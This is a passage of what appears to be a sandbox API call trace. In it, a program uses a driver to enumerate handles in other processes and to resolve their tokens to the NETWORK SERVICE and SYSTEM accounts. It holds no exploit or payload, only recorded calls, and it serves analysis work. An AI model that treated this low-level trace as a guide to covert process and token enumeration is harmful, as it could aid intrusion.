(in: ProcessId=0xa74, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.601] PsAcquireProcessExitSynchronization () returned 0x0 [0246.601] KeStackAttachProcess (in: PROCESS=0xfffffa8002345b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002345b30, ApcState=0xfffff880053c85d0) [0246.601] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80024d3bb0, HandleInformation=0x0) returned 0x0 [0246.601] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.601] PsReleaseProcessExitSynchronization () returned 0x2 [0246.601] ObfDereferenceObject (Object=0xfffffa8002345b30) returned 0x22 [0246.601] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.601] ObfDereferenceObject (Object=0xfffffa80024d3bb0) returned 0x1 [0246.602] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.602] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.602] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.602] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xa2, lpOverlapped=0x0) returned 1 [0246.602] PsLookupProcessByProcessId (in: ProcessId=0xa74, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.602] PsAcquireProcessExitSynchronization () returned 0x0 [0246.602] KeStackAttachProcess (in: PROCESS=0xfffffa8002345b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002345b30, ApcState=0xfffff880053c85d0) [0246.602] ObReferenceObjectByHandle (in: Handle=0xf8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800264ef20, HandleInformation=0x0) returned 0x0 [0246.602] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.602] PsReleaseProcessExitSynchronization () returned 0x2 [0246.602] ObfDereferenceObject (Object=0xfffffa8002345b30) returned 0x22 [0246.602] ObQueryNameString (in: Object=0xfffffa800264ef20, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.602] ObfDereferenceObject (Object=0xfffffa800264ef20) returned 0x3 [0246.602] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.602] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.602] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.602] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0246.602] PsLookupProcessByProcessId (in: ProcessId=0xa74, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.602] PsAcquireProcessExitSynchronization () returned 0x0 [0246.602] KeStackAttachProcess (in: PROCESS=0xfffffa8002345b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002345b30, ApcState=0xfffff880053c85d0) [0246.602] ObReferenceObjectByHandle (in: Handle=0xfc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800264eac0, HandleInformation=0x0) returned 0x0 [0246.602] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.603] PsReleaseProcessExitSynchronization () returned 0x2 [0246.603] ObfDereferenceObject (Object=0xfffffa8002345b30) returned 0x22 [0246.603] ObQueryNameString (in: Object=0xfffffa800264eac0, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.603] ObfDereferenceObject (Object=0xfffffa800264eac0) returned 0x3 [0246.603] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.603] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0xc8 [0246.603] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.603] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80026627f0, HandleInformation=0x0) returned 0x0 [0246.603] ObOpenObjectByPointer (in: Object=0xfffffa80026627f0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.603] ObfDereferenceObject (Object=0xfffffa80026627f0) returned 0x2a [0246.603] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8003ab1940 | out: TokenHandle=0xfffffa8003ab1940*=0xc4) returned 0x0 [0246.603] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.603] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.603] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.604] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="NETWORK SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.606] CloseHandle (hObject=0xc4) returned 1 [0246.606] CloseHandle (hObject=0xc8) returned 1 [0246.606] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.606] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0246.606] PsLookupProcessByProcessId (in: ProcessId=0x304, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.606] PsAcquireProcessExitSynchronization () returned 0x0 [0246.606] KeStackAttachProcess (in: PROCESS=0xfffffa80026627f0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80026627f0, ApcState=0xfffff880053c85d0) [0246.606] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002147c20, HandleInformation=0x0) returned 0x0 [0246.606] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.606] PsReleaseProcessExitSynchronization () returned 0x2 [0246.606] ObfDereferenceObject (Object=0xfffffa80026627f0) returned 0x28 [0246.606] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.606] ObfDereferenceObject (Object=0xfffffa8002147c20) returned 0x1 [0246.606] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.606] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.606] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.606] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0246.606] PsLookupProcessByProcessId (in: ProcessId=0x304, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.606] PsAcquireProcessExitSynchronization () returned 0x0 [0246.606] KeStackAttachProcess (in: PROCESS=0xfffffa80026627f0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80026627f0, ApcState=0xfffff880053c85d0) [0246.606] ObReferenceObjectByHandle (in: Handle=0x74, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80026a1be0, HandleInformation=0x0) returned 0x0 [0246.606] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.606] PsReleaseProcessExitSynchronization () returned 0x2 [0246.607] ObfDereferenceObject (Object=0xfffffa80026627f0) returned 0x28 [0246.607] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.607] ObfDereferenceObject (Object=0xfffffa80026a1be0) returned 0x1 [0246.607] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.607] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.607] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.607] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0246.607] PsLookupProcessByProcessId (in: ProcessId=0x304, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.607] PsAcquireProcessExitSynchronization () returned 0x0 [0246.607] KeStackAttachProcess (in: PROCESS=0xfffffa80026627f0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80026627f0, ApcState=0xfffff880053c85d0) [0246.607] ObReferenceObjectByHandle (in: Handle=0x148, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80030202f0, HandleInformation=0x0) returned 0x0 [0246.607] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.607] PsReleaseProcessExitSynchronization () returned 0x2 [0246.607] ObfDereferenceObject (Object=0xfffffa80026627f0) returned 0x28 [0246.607] ObQueryNameString (in: Object=0xfffffa8002821590, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.607] ObfDereferenceObject (Object=0xfffffa80030202f0) returned 0x1 [0246.607] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.607] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.607] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.607] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0246.607] PsLookupProcessByProcessId (in: ProcessId=0x304, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.607] PsAcquireProcessExitSynchronization () returned 0x0 [0246.607] KeStackAttachProcess (in: PROCESS=0xfffffa80026627f0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80026627f0, ApcState=0xfffff880053c85d0) [0246.607] ObReferenceObjectByHandle (in: Handle=0x184, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003022590, HandleInformation=0x0) returned 0x0 [0246.608] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.608] PsReleaseProcessExitSynchronization () returned 0x2 [0246.608] ObfDereferenceObject (Object=0xfffffa80026627f0) returned 0x28 [0246.608] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.608] ObfDereferenceObject (Object=0xfffffa8003022590) returned 0x1 [0246.608] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.608] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.608] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.608] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0246.608] PsLookupProcessByProcessId (in: ProcessId=0x304, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.608] PsAcquireProcessExitSynchronization () returned 0x0 [0246.608] KeStackAttachProcess (in: PROCESS=0xfffffa80026627f0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80026627f0, ApcState=0xfffff880053c85d0) [0246.608] ObReferenceObjectByHandle (in: Handle=0x1b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80019da070, HandleInformation=0x0) returned 0x0 [0246.608] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.608] PsReleaseProcessExitSynchronization () returned 0x2 [0246.608] ObfDereferenceObject (Object=0xfffffa80026627f0) returned 0x28 [0246.608] ObQueryNameString (in: Object=0xfffffa8002821590, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.608] ObfDereferenceObject (Object=0xfffffa80019da070) returned 0x3 [0246.608] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.608] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x98c) returned 0xc8 [0246.608] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.608] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8002fe8060, HandleInformation=0x0) returned 0x0 [0246.608] ObOpenObjectByPointer (in: Object=0xfffffa8002fe8060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.609] ObfDereferenceObject (Object=0xfffffa8002fe8060) returned 0x47 [0246.609] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8003ab1940 | out: TokenHandle=0xfffffa8003ab1940*=0xc4) returned 0x0 [0246.609] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.609] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.609] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.609] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.611] CloseHandle (hObject=0xc4) returned 1 [0246.611] CloseHandle (hObject=0xc8) returned 1 [0246.611] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.611] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0246.611] PsLookupProcessByProcessId (in: ProcessId=0x98c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.611] PsAcquireProcessExitSynchronization () returned 0x0 [0246.611] KeStackAttachProcess (in: PROCESS=0xfffffa8002fe8060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002fe8060, ApcState=0xfffff880053c85d0) [0246.611] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002feb3d0, HandleInformation=0x0) returned 0x0 [0246.611] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.611] PsReleaseProcessExitSynchronization () returned 0x2 [0246.611] ObfDereferenceObject (Object=0xfffffa8002fe8060) returned 0x45 [0246.611] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.611] ObfDereferenceObject (Object=0xfffffa8002feb3d0) returned 0x1 [0246.611] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.611] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.611] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.611] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0246.611] PsLookupProcessByProcessId (in: ProcessId=0x98c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.612] PsAcquireProcessExitSynchronization () returned 0x0 [0246.612] KeStackAttachProcess (in: PROCESS=0xfffffa8002fe8060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002fe8060, ApcState=0xfffff880053c85d0) [0246.612] ObReferenceObjectByHandle (in: Handle=0x60, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800313fd00, HandleInformation=0x0) returned 0x0 [0246.612] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.612] PsReleaseProcessExitSynchronization () returned 0x2 [0246.612] ObfDereferenceObject (Object=0xfffffa8002fe8060) returned 0x45 [0246.612] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.612] ObfDereferenceObject (Object=0xfffffa800313fd00) returned 0x1 [0246.612] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.612] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.612] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.612] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x68, lpOverlapped=0x0) returned 1 [0246.612] PsLookupProcessByProcessId (in: ProcessId=0x98c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.612] PsAcquireProcessExitSynchronization () returned 0x0 [0246.612] KeStackAttachProcess (in: PROCESS=0xfffffa8002fe8060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002fe8060, ApcState=0xfffff880053c85d0) [0246.612] ObReferenceObjectByHandle (in: Handle=0x100, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000f62610, HandleInformation=0x0) returned 0x0 [0246.612] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.612] PsReleaseProcessExitSynchronization () returned 0x2 [0246.612] ObfDereferenceObject (Object=0xfffffa8002fe8060) returned 0x45 [0246.612] ObQueryNameString (in: Object=0xfffff8a000f62610, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.612] ObfDereferenceObject (Object=0xfffff8a000f62610) returned 0x7 [0246.612] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.612] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.612] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.612] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xca, lpOverlapped=0x0) returned 1 [0246.613] PsLookupProcessByProcessId (in: ProcessId=0x98c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.613] PsAcquireProcessExitSynchronization () returned 0x0 [0246.613] KeStackAttachProcess (in: PROCESS=0xfffffa8002fe8060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002fe8060, ApcState=0xfffff880053c85d0) [0246.613] ObReferenceObjectByHandle (in: Handle=0x154, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002640cd0, HandleInformation=0x0) returned 0x0 [0246.613] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.613] PsReleaseProcessExitSynchronization () returned 0x2 [0246.613] ObfDereferenceObject (Object=0xfffffa8002fe8060) returned 0x45 [0246.613] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.613] ObfDereferenceObject (Object=0xfffffa8002640cd0) returned 0x13 [0246.613] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.613] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.613] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.613] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0246.613] PsLookupProcessByProcessId (in: ProcessId=0x98c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.613] PsAcquireProcessExitSynchronization () returned 0x0 [0246.613] KeStackAttachProcess (in: PROCESS=0xfffffa8002fe8060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002fe8060, ApcState=0xfffff880053c85d0) [0246.613] ObReferenceObjectByHandle (in: Handle=0x254, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002eefdd0, HandleInformation=0x0) returned 0x0 [0246.613] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.613] PsReleaseProcessExitSynchronization () returned 0x2 [0246.613] ObfDereferenceObject (Object=0xfffffa8002fe8060) returned 0x45 [0246.613] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.613] ObfDereferenceObject (Object=0xfffffa8002eefdd0) returned 0x1 [0246.613] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.614] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.614] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.614] 